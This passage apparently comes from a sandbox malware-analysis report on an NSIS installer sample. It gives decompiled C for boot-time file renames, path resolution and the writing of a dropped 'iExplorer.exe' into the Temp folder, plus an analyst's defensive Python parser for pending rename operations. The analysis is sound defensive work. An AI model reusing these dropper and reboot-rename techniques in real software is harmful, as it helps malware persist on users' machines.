                                                                      									goto L20;
                                                                      								}
                                                                      								do {
                                                                      									L20:
                                                                      									 *((char*)(_t43 + _t54)) =  *_t54;
                                                                      									_t54 = _t54 + 1;
                                                                      								} while (_t54 < _t44);
                                                                      								goto L21;
                                                                      							}
                                                                      							E004059A4(_t51 + _t47, "[Rename]\r\n");
                                                                      							_t47 = _t47 + 0xa;
                                                                      							goto L13;
                                                                      						}
                                                                      					}
                                                                      				} else {
                                                                      					CloseHandle(E00405680(_t49, 0, 1));
                                                                      					_t16 = GetShortPathNameA(_t49, 0x42c618, 0x400);
                                                                      					if(_t16 != 0 && _t16 <= 0x400) {
                                                                      						goto L5;
                                                                      					}
                                                                      				}
                                                                      				return _t16;
                                                                      			}

                                                                      APIs
                                                                        • Part of subcall function 00405CAA: GetModuleHandleA.KERNEL32(000000F1,0040570A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CAE
                                                                        • Part of subcall function 00405CAA: LoadLibraryA.KERNEL32(000000F1,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 00405CBC
                                                                        • Part of subcall function 00405CAA: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CCB
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,0040548D,?,00000000,000000F1,?), ref: 0040574C
                                                                      • GetShortPathNameA.KERNEL32 ref: 00405755
                                                                      • GetShortPathNameA.KERNEL32 ref: 00405772
                                                                      • wsprintfA.USER32 ref: 00405790
                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042C090,C0000000,00000004,0042C090,?,0040548D,?,00000000,000000F1,?), ref: 004057CB
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004057DA
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004057F0
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042BC90,00000000,-0000000A,004092F4,00000000,[Rename]), ref: 00405836
                                                                      • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405848
                                                                      • GlobalFree.KERNEL32 ref: 0040584F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405856
                                                                        • Part of subcall function 004055F5: lstrlenA.KERNEL32(?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 004055FC
                                                                        • Part of subcall function 004055F5: lstrlenA.KERNEL32(?,?,?,00000000,00000000,0040580B,00000000,[Rename]), ref: 0040562C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                      • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]
                                                                      • API String ID: 3772915668-3759977537
                                                                      • Opcode ID: 7b465b69e4ceb808ad1a35f2f7796c976373172554304188f9f83f7aecf1ccdd
                                                                      • Instruction ID: c457da330c65f7e736f2951005c0eab01e8b3e19eb512715ea7ec2ec436f3c8e
                                                                      • Opcode Fuzzy Hash: 7b465b69e4ceb808ad1a35f2f7796c976373172554304188f9f83f7aecf1ccdd
                                                                      • Instruction Fuzzy Hash: F241E332A00B15BBD7207B619D49F6B3A9CDF45754F14443AFE05F62C2EA7CA8048AAD
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
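The API and string list above describes a reboot-time file replacement routine: it resolves MoveFileExA from KERNEL32 at run time (GetModuleHandleA / LoadLibraryA / GetProcAddress) and, when that export is missing, converts both paths with GetShortPathNameA and appends a "%s=%s" line under "[Rename]" at the end of an INI file. That is the Windows 9x wininit.ini mechanism, where WININIT.EXE processes "destination=source" lines at the next boot and a destination of NUL deletes the source. On NT-family systems the same request made through MoveFileExA with MOVEFILE_DELAY_UNTIL_REBOOT lands instead in the REG_MULTI_SZ value PendingFileRenameOperations under HKLM\SYSTEM\CurrentControlSet\Control\Session Manager. The following triage helper, added here as an example and not code from the sample or from the sandbox, parses both forms into one list so an analyst can see what a host is scheduled to rename or delete at boot. The file contents and registry data in it are constructed; the "!" prefix handling reflects how MoveFileEx records MOVEFILE_REPLACE_EXISTING in that value.

```python
"""Normalise pending boot-time file operations from wininit.ini [Rename] and from
PendingFileRenameOperations (added example; inputs below are constructed)."""

from dataclasses import dataclass
from typing import List, Sequence


@dataclass(frozen=True)
class PendingOp:
    action: str        # "rename" or "delete"
    source: str
    destination: str   # empty for "delete"
    origin: str        # "wininit.ini" or "registry"


def parse_wininit_rename(ini_text: str) -> List[PendingOp]:
    """[Rename] lines read destination=source; a destination of NUL deletes source."""
    ops: List[PendingOp] = []
    in_rename = False
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_rename = line[1:-1].strip().lower() == "rename"
            continue
        if not in_rename or "=" not in line:
            continue
        dst, src = (part.strip() for part in line.split("=", 1))
        if dst.upper() == "NUL":
            ops.append(PendingOp("delete", src, "", "wininit.ini"))
        else:
            ops.append(PendingOp("rename", src, dst, "wininit.ini"))
    return ops


def _strip_nt_prefix(path: str) -> str:
    """MoveFileEx stores NT object paths (\\??\\C:\\...); a leading '!' on the
    destination records MOVEFILE_REPLACE_EXISTING."""
    path = path.lstrip("!")
    return path[4:] if path.startswith("\\??\\") else path


def parse_pending_file_rename_operations(multi_sz: Sequence[str]) -> List[PendingOp]:
    """The value is a flat list of (source, destination) pairs; an empty destination
    means delete. A trailing empty terminator string, if present, is ignored."""
    entries = list(multi_sz)
    if len(entries) % 2 == 1 and entries[-1] == "":
        entries.pop()
    if len(entries) % 2:
        raise ValueError("PendingFileRenameOperations must contain source/destination pairs")
    ops: List[PendingOp] = []
    for src, dst in zip(entries[0::2], entries[1::2]):
        if dst == "":
            ops.append(PendingOp("delete", _strip_nt_prefix(src), "", "registry"))
        else:
            ops.append(PendingOp("rename", _strip_nt_prefix(src), _strip_nt_prefix(dst), "registry"))
    return ops


def ops_touching(ops: Sequence[PendingOp], directory: str) -> List[PendingOp]:
    """Operations whose target (destination, or source for deletes) lies under directory."""
    prefix = directory.rstrip("\\").lower() + "\\"
    return [op for op in ops if (op.destination or op.source).lower().startswith(prefix)]


# Constructed inputs (not taken from the analysed sample) for a stand-alone run.
SAMPLE_WININIT = """; wininit.ini
[Rename]
NUL=C:\\TEMP\\DROPPE~1.EXE
C:\\WINDOWS\\SYSTEM\\HELPER.EXE=C:\\TEMP\\HELPER~1.TMP

[Other]
ignored=1
"""
SAMPLE_PFRO = [
    "\\??\\C:\\Windows\\Temp\\stage.tmp", "!\\??\\C:\\Windows\\System32\\helper.exe",
    "\\??\\C:\\Users\\Public\\old.exe", "",
    "",
]


def triage() -> List[PendingOp]:
    return parse_wininit_rename(SAMPLE_WININIT) + parse_pending_file_rename_operations(SAMPLE_PFRO)


if __name__ == "__main__":
    for op in triage():
        print(f"{op.origin:12} {op.action:6} {op.source} -> {op.destination or '(delete)'}")
```

On a live NT host the registry list is read with winreg from the key named above; wininit.ini only matters on 9x-era systems, but a sample that writes it is still a useful indicator because legitimate modern software never does.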

C-Code - Quality: 90%
			/* Window procedure of the borderless background window. The parameters are
			   the usual (hwnd, uMsg, wParam, lParam); the decompiler reuses _a8, _a12 and
			   _a16 as scratch slots for the HDC, the blend weight and the brush/font handles. */
			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {                                   /* WM_PAINT */
					_t130 =  *0x42f028;                            /* global settings block: +0x34 LOGFONTA, +0x50/+0x54 gradient colours, +0x58 text colour (-1 = no caption) */
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;      /* BS_SOLID */
					_a8 = _t70;                                    /* _a8 now holds the HDC */
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;                           /* client height */
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {                      /* fill 4-pixel strips from top to bottom */
						_a12 = _t126 - _v32.top;                   /* weight of the colour at +0x50 */
						asm("cdq");                                /* three signed divisions, one per colour channel; */
						asm("cdq");                                /* the decompiler recovered only one channel below */
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;   /* linear blend of the two colours by row */
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {           /* caption enabled */
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;                      /* draw the caption at (16, 8) */
							_v32.top = 8;
							SetBkMode(_t128, 1);                   /* TRANSPARENT */
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x42e820, 0xffffffff,  &_v32, 0x820);   /* global caption string, NUL-terminated, DT_SINGLELINE | DT_NOPREFIX */
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {                                  /* WM_WINDOWPOSCHANGING: lParam is a WINDOWPOS */
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;   /* flags |= SWP_NOACTIVATE */
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f024;       /* hwndInsertAfter = the global main window, so this window stays behind it without taking focus */
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}


                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32 ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32 ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
• Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: aeaabe400f50fdb51333509684138e8676dc32cedc9402a7c94534d5e56a624e
                                                                      • Instruction ID: 309bda7df5df2fef83454fedbd0719e2c402cedce3bce7de45e8ac9361e32187
                                                                      • Opcode Fuzzy Hash: aeaabe400f50fdb51333509684138e8676dc32cedc9402a7c94534d5e56a624e
                                                                      • Instruction Fuzzy Hash: E741AA71804249AFCB058FA5CD459BF7FB9FF44314F00802AF951AA1A0C738EA54DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E004059C6(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
                                                                      				struct _ITEMIDLIST* _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				CHAR* _t34;
                                                                      				signed int _t36;
                                                                      				signed int _t38;
                                                                      				long _t51;
                                                                      				signed int _t53;
                                                                      				signed int _t61;
                                                                      				char* _t62;
                                                                      				char _t66;
                                                                      				signed int _t68;
                                                                      				CHAR* _t78;
                                                                      				signed int _t85;
                                                                      				void* _t88;
                                                                      
                                                                      				_t61 = _a8;
                                                                      				if(_t61 < 0) {
                                                                      					_t61 =  *( *0x42e7fc - 4 + _t61 * 4);
                                                                      				}
                                                                      				_t62 = _t61 +  *0x42f058;
                                                                      				_t34 = 0x42dfc0;
                                                                      				_t78 = 0x42dfc0;
                                                                      				if(_a4 - 0x42dfc0 < 0x800) {
                                                                      					_t78 = _a4;
                                                                      					_a4 = _a4 & 0x00000000;
                                                                      				}
                                                                      				while(1) {
                                                                      					_t66 =  *_t62;
                                                                      					_a11 = _t66;
                                                                      					if(_t66 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					__eflags = _t78 - _t34 - 0x400;
                                                                      					if(_t78 - _t34 >= 0x400) {
                                                                      						break;
                                                                      					}
                                                                      					_t62 = _t62 + 1;
                                                                      					__eflags = _t66 - 0xfc;
                                                                      					if(__eflags <= 0) {
                                                                      						if(__eflags != 0) {
                                                                      							 *_t78 = _t66;
                                                                      							_t78 =  &(_t78[1]);
                                                                      							__eflags = _t78;
                                                                      						} else {
                                                                      							 *_t78 =  *_t62;
                                                                      							_t78 =  &(_t78[1]);
                                                                      							_t62 = _t62 + 1;
                                                                      						}
                                                                      						continue;
                                                                      					}
                                                                      					_t36 =  *((char*)(_t62 + 1));
                                                                      					_t68 =  *_t62;
                                                                      					_t85 = (_t36 & 0x0000007f) << 0x00000007 | _t68 & 0x0000007f;
                                                                      					_v16 = _t36;
                                                                      					_v12 = _t36 | 0x00008000;
                                                                      					_t38 = 2;
                                                                      					_v24 = _t68;
                                                                      					_t62 = _t62 + _t38;
                                                                      					__eflags = _a11 - 0xfe;
                                                                      					_v20 = _t68 | 0x00008000;
                                                                      					if(_a11 != 0xfe) {
                                                                      						__eflags = _a11 - 0xfd;
                                                                      						if(_a11 != 0xfd) {
                                                                      							__eflags = _a11 - 0xff;
                                                                      							if(_a11 == 0xff) {
                                                                      								__eflags = (_t38 | 0xffffffff) - _t85;
                                                                      								E004059C6(_t62, _t78, _t85, _t78, (_t38 | 0xffffffff) - _t85);
                                                                      							}
                                                                      							goto L34;
                                                                      						}
                                                                      						__eflags = _t85 - 0x1b;
                                                                      						if(_t85 != 0x1b) {
                                                                      							__eflags = (_t85 << 0xa) + 0x430000;
                                                                      							E004059A4(_t78, (_t85 << 0xa) + 0x430000);
                                                                      						} else {
                                                                      							E00405902(_t78,  *0x42f024);
                                                                      						}
                                                                      						__eflags = _t85 + 0xffffffeb - 6;
                                                                      						if(_t85 + 0xffffffeb >= 6) {
                                                                      							goto L34;
                                                                      						} else {
                                                                      							goto L25;
                                                                      						}
                                                                      					} else {
                                                                      						__eflags =  *0x42f0a4;
                                                                      						_a8 = _t38;
                                                                      						if( *0x42f0a4 != 0) {
                                                                      							_a8 = 4;
                                                                      						}
                                                                      						do {
                                                                      							_a8 = _a8 - 1;
                                                                      							_t51 = SHGetSpecialFolderLocation( *0x42f024,  *(_t88 + _a8 * 4 - 0x14),  &_v8);
                                                                      							__eflags = _t51;
                                                                      							if(_t51 != 0) {
                                                                      								goto L11;
                                                                      							}
                                                                      							__imp__SHGetPathFromIDListA(_v8, _t78);
                                                                      							__imp__CoTaskMemFree(_v8);
                                                                      							__eflags = _t51;
                                                                      							if(_t51 != 0) {
                                                                      								break;
                                                                      							}
                                                                      							L11:
                                                                      							 *_t78 =  *_t78 & 0x00000000;
                                                                      							__eflags = _a8;
                                                                      						} while (_a8 != 0);
                                                                      						__eflags =  *_t78;
                                                                      						if( *_t78 != 0) {
                                                                      							L23:
                                                                      							__eflags = _v16 - 0x1a;
                                                                      							if(_v16 == 0x1a) {
                                                                      								lstrcatA(_t78, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                      							}
                                                                      							L25:
                                                                      							E00405BD3(_t78);
                                                                      							L34:
                                                                      							_t78 =  &(_t78[lstrlenA(_t78)]);
                                                                      							_t34 = 0x42dfc0;
                                                                      							continue;
                                                                      						}
                                                                      						_t53 = _v24;
                                                                      						__eflags = _t53 - 0x2b;
                                                                      						if(_t53 != 0x2b) {
                                                                      							__eflags = _t53 - 0x26;
                                                                      							if(_t53 != 0x26) {
                                                                      								__eflags = _t53 - 0x25;
                                                                      								if(_t53 != 0x25) {
                                                                      									__eflags = _t53 - 0x24;
                                                                      									if(_t53 == 0x24) {
                                                                      										GetWindowsDirectoryA(_t78, 0x400);
                                                                      									}
                                                                      								} else {
                                                                      									GetSystemDirectoryA(_t78, 0x400);
                                                                      								}
                                                                      								L22:
                                                                      								__eflags =  *_t78;
                                                                      								if( *_t78 == 0) {
                                                                      									goto L25;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							E00405898(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t78);
                                                                      							__eflags =  *_t78;
                                                                      							if( *_t78 != 0) {
                                                                      								goto L23;
                                                                      							}
                                                                      							E004059A4(_t78, "C:\\Program Files");
                                                                      							goto L22;
                                                                      						}
                                                                      						E00405898(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t78);
                                                                      						goto L22;
                                                                      					}
                                                                      				}
                                                                      				 *_t78 =  *_t78 & 0x00000000;
                                                                      				if(_a4 == 0) {
                                                                      					return _t34;
                                                                      				}
                                                                      				return E004059A4(_a4, _t34);
                                                                      			}

                                                                      APIs
                                                                      • SHGetSpecialFolderLocation.SHELL32(00429C60,74B5EA30,00000006,00429C60,00000000,00429C60,00000000), ref: 00405A8D
                                                                      • SHGetPathFromIDListA.SHELL32(74B5EA30,0042DFC0), ref: 00405A9B
                                                                      • CoTaskMemFree.OLE32(74B5EA30), ref: 00405AA6
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00405B14
                                                                        • Part of subcall function 00405898: RegOpenKeyExA.ADVAPI32(80000002,00405AF7,00000000,00020019,00405AF7,?,00000001,?,00405AF7,80000002,Software\Microsoft\Windows\CurrentVersion,ProgramFilesDir,0042DFC0), ref: 004058B4
                                                                        • Part of subcall function 00405898: RegQueryValueExA.ADVAPI32(00405AF7,?,00000000,80000002,00000001,80000002,?,00405AF7), ref: 004058D5
                                                                        • Part of subcall function 00405898: RegCloseKey.ADVAPI32(00405AF7,?,00405AF7), ref: 004058F6
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                      • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405B3E
                                                                      • lstrlenA.KERNEL32(0042DFC0,00000006,00429C60,00000000,00429C60,00000000,00000000,0041A9FD,74B5EA30), ref: 00405B92
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CloseDirectoryFolderFreeFromListLocationOpenPathQuerySpecialSystemTaskValuelstrcatlstrcpynlstrlen
                                                                      • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 3624987713-2320700955
                                                                      • Opcode ID: f2577ec4d75bdf119fcc4298951d2df559b40930981e5faea5ef9c31dc56e8d5
                                                                      • Instruction ID: cef6d0386ae25b918226feabc47577c78b5e9d4a017e7e4b9bf51ca37024a254
                                                                      • Opcode Fuzzy Hash: f2577ec4d75bdf119fcc4298951d2df559b40930981e5faea5ef9c31dc56e8d5
                                                                      • Instruction Fuzzy Hash: D3512471A04A44AFDF209B648884B7F3BB4DB55324F24823BF955B62D2D23C6942CF5E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 33%
                                                                      			E004026F7() {
                                                                      				void* _t23;
                                                                      				void* _t29;
                                                                      				long _t34;
                                                                      				struct _OVERLAPPED* _t49;
                                                                      				void* _t52;
                                                                      				void* _t54;
                                                                      				void* _t55;
                                                                      				CHAR* _t56;
                                                                      				void* _t59;
                                                                      				void* _t60;
                                                                      				void* _t61;
                                                                      
                                                                      				 *((intOrPtr*)(_t61 - 0x34)) = 0xfffffd66;
                                                                      				_t55 = E00402A9D(_t49);
                                                                      				_t23 = E00405509(_t55);
                                                                      				_push(_t55);
                                                                      				if(_t23 == 0) {
                                                                      					lstrcatA(E0040549D(E004059A4(" C:\Users\hardz\AppData\Local\Temp\iExplorer.exe", "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                                                      					_t56 = 0x409fe8;
                                                                      				} else {
                                                                      					_push(0x409fe8);
                                                                      					E004059A4();
                                                                      				}
                                                                      				E00405BD3(_t56);
                                                                      				E00405661(_t56);
                                                                      				_t29 = E00405680(_t56, 0x40000000, 2);
                                                                      				 *(_t61 + 8) = _t29;
                                                                      				if(_t29 != 0xffffffff) {
                                                                      					_t34 =  *0x42f02c;
                                                                      					 *(_t61 - 0x2c) = _t34;
                                                                      					_t54 = GlobalAlloc(0x40, _t34);
                                                                      					if(_t54 != _t49) {
                                                                      						E00403112(_t49);
                                                                      						E004030E0(_t54,  *(_t61 - 0x2c));
                                                                      						_t59 = GlobalAlloc(0x40,  *(_t61 - 0x1c));
                                                                      						 *(_t61 - 0x30) = _t59;
                                                                      						if(_t59 != _t49) {
                                                                      							_push( *(_t61 - 0x1c));
                                                                      							_push(_t59);
                                                                      							_push(_t49);
                                                                      							_push( *((intOrPtr*)(_t61 - 0x20)));
                                                                      							E00402EB4();
                                                                      							while( *_t59 != _t49) {
                                                                      								_t60 = _t59 + 8;
                                                                      								 *(_t61 - 0x38) =  *_t59;
                                                                      								E00405641( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                                                      								_t59 = _t60 +  *(_t61 - 0x38);
                                                                      							}
                                                                      							GlobalFree( *(_t61 - 0x30));
                                                                      						}
                                                                      						WriteFile( *(_t61 + 8), _t54,  *(_t61 - 0x2c), _t61 - 0x44, _t49);
                                                                      						GlobalFree(_t54);
                                                                      						_push(_t49);
                                                                      						_push(_t49);
                                                                      						_push( *(_t61 + 8));
                                                                      						_push(0xffffffff);
                                                                      						 *((intOrPtr*)(_t61 - 0x34)) = E00402EB4();
                                                                      					}
                                                                      					CloseHandle( *(_t61 + 8));
                                                                      					_t56 = 0x409fe8;
                                                                      				}
                                                                      				_t52 = 0xfffffff3;
                                                                      				if( *((intOrPtr*)(_t61 - 0x34)) < _t49) {
                                                                      					_t52 = 0xffffffef;
                                                                      					DeleteFileA(_t56);
                                                                      					 *((intOrPtr*)(_t61 - 4)) = 1;
                                                                      				}
                                                                      				_push(_t52);
                                                                      				E00401428();
                                                                      				 *0x42f0a8 =  *0x42f0a8 +  *((intOrPtr*)(_t61 - 4));
                                                                      				return 0;
                                                                      			}

                                                                      APIs
                                                                      • lstrcatA.KERNEL32(00000000,00000000, C:\Users\user\AppData\Local\Temp\iExplorer.exe,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402734
                                                                      • GlobalAlloc.KERNEL32(00000040,?, C:\Users\user\AppData\Local\Temp\iExplorer.exe,40000000,00000002, C:\Users\user\AppData\Local\Temp\iExplorer.exe, C:\Users\user\AppData\Local\Temp\iExplorer.exe,00000000,00000000, C:\Users\user\AppData\Local\Temp\iExplorer.exe,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402774
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402790
                                                                      • GlobalFree.KERNEL32 ref: 004027C9
                                                                      • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027DB
                                                                      • GlobalFree.KERNEL32 ref: 004027E2
                                                                      • CloseHandle.KERNEL32(?), ref: 004027FA
                                                                      • DeleteFileA.KERNEL32( C:\Users\user\AppData\Local\Temp\iExplorer.exe, C:\Users\user\AppData\Local\Temp\iExplorer.exe,40000000,00000002, C:\Users\user\AppData\Local\Temp\iExplorer.exe, C:\Users\user\AppData\Local\Temp\iExplorer.exe,00000000,00000000, C:\Users\user\AppData\Local\Temp\iExplorer.exe,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402811
                                                                        • Part of subcall function 004059A4: lstrcpynA.KERNEL32(?,?,00000400,004031B6,0042E820,NSIS Error), ref: 004059B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\iExplorer.exe$C:\Users\user\AppData\Local\Temp
                                                                      • API String ID: 3508600917-812238309
                                                                      • Opcode ID: aa18f427e0657756ccdb60b2df1a0131b36aec745ef804db1697e91c00747692
                                                                      • Instruction ID: e6ae9f1591bfa76b9c880210125a6dd4318928060825aafe26ac1f73a67447f5
                                                                      • Opcode Fuzzy Hash: aa18f427e0657756ccdb60b2df1a0131b36aec745ef804db1697e91c00747692
                                                                      • Instruction Fuzzy Hash: 7F31BC71C00515BBCF116FA5CE89DAF7A79EF09324B10823AF914B72D2C67D5D018BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00403E16(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                      				struct tagLOGBRUSH _v16;
                                                                      				long _t35;
                                                                      				long _t37;
                                                                      				void* _t40;
                                                                      				long* _t49;
                                                                      
                                                                      				if(_a4 + 0xfffffecd > 5) { // 0x00403e28
                                                                      					L15: // 0x00403ebc
                                                                      					return 0;
                                                                      				} // 0x00403ebc
                                                                      				_t49 = GetWindowLongA(_a12, 0xffffffeb); // 0x00403e39
                                                                      				if(_t49 == 0) { // 0x00403e3d
                                                                      					goto L15;
                                                                      				}
                                                                      				_t35 =  *_t49; // 0x00403e43
                                                                      				if((_t49[5] & 0x00000002) != 0) { // 0x00403e4c
                                                                      					_t35 = GetSysColor(_t35); // 0x00403e4f
                                                                      				} // 0x00403e4f
                                                                      				if((_t49[5] & 0x00000001) != 0) { // 0x00403e55
                                                                      					SetTextColor(_a8, _t35); // 0x00403e5b
                                                                      				} // 0x00403e5b
                                                                      				SetBkMode(_a8, _t49[4]); // 0x00403e67
                                                                      				_t37 = _t49[1]; // 0x00403e6d
                                                                      				_v16.lbColor = _t37; // 0x00403e74
                                                                      				if((_t49[5] & 0x00000008) != 0) { // 0x00403e77
                                                                      					_t37 = GetSysColor(_t37); // 0x00403e7a
                                                                      					_v16.lbColor = _t37; // 0x00403e7c
                                                                      				} // 0x00403e7c
                                                                      				if((_t49[5] & 0x00000004) != 0) { // 0x00403e84
                                                                      					SetBkColor(_a8, _t37); // 0x00403e8a
                                                                      				} // 0x00403e8a
                                                                      				if((_t49[5] & 0x00000010) != 0) { // 0x00403e94
                                                                      					_v16.lbStyle = _t49[2]; // 0x00403e99
                                                                      					_t40 = _t49[3]; // 0x00403e9c
                                                                      					if(_t40 != 0) { // 0x00403ea1
                                                                      						DeleteObject(_t40); // 0x00403ea4
                                                                      					} // 0x00403ea4
                                                                      					_t49[3] = CreateBrushIndirect( &_v16); // 0x00403eb4
